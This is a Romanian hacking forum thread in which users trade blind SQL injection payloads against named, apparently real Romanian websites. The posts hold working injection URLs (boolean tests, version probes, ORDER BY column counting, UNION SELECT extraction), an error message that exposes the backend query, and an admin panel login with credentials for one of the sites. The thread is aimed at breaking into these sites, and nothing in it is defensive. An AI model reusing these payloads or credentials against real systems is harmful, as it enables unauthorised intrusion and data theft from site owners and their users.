putin ajutor la blind sql

[pacealik]

am gasit un site vulnerabil dar ma incurc la un moment dat

www.compass.ro/ro/sectiune.php?s=253+and+1=1 merge

www.compass.ro/ro/sectiune.php?s=253+and+1=2 nu merge inseamna ca da tot din casa

compass.ro/ro/sectiune.php?s=253+and+substring(@@version,1,1)=4 mysql v4

compass.ro/ro/sectiune.php?s=253+and+(select+1)=1 select merge

compass.ro/ro/sectiune.php?s=253+order+by+8/* 8 coloane

si aici nu mai merge

www.compass.ro/ro/sectiune.php?s=253+union+all+select+group_concat(table_name),2,3,4,5,6,7,8+from%20information_schema.tables/*

o idee ceva?

[pacealik]

inca un site vulnerabil dar nu reusesc sa-l exploatez

http://www.city-mall.ro/locatii.php?basecategory=1&filter2=1%27

[vfather]

http://www.compass.ro/ro/sectiune.php?s=5%20union%20all%20select%201,convert(version()%20using%20latin1),3,4,5,6,7,8--

4.1.10-standard

information_schema.tables > 5v, deci nu te poti folosi de asta pentru a afla tabelele(trebuie sa le ghicesti).

[pacealik]

asta am zis si eu mai sus uite

compass.ro/ro/sectiune.php?s=253+and+substring(@@version,1,1)=4 mysql v4

nasol cu mysql 4 n-am cum dracu sa ii ghicesc tabelele

[tw8]

^

La compass.ro poti transforma SQLI-ul ala in alta vulnerabilitate - te las sa iti dai seama cum pentru ca gandirea nu strica niciodata.

La celalalt, http://www.city-mall.ro/_admin/ , admin:george.

Bafta .

[pacealik]

salut

ms de reply

zi`mi te rog cum ai exploatat city-mall.ro am incercat de mi-au sarit capacele nu am reusit

si la compass nu mi-at nici un indiciu ca sa pot sa`mi dau seama

salut

[a13x4nd7u]

Poate ajuta:

http://www.compass.ro/ro/sectiune.php?s=253+and+select+*+from+*

Query failed: SELECT nume, titlu, continut, nume_fisier, ultima_actualizare, title, keywords, description FROM ro_sectiuni WHERE ID_sec = 253 and select * from *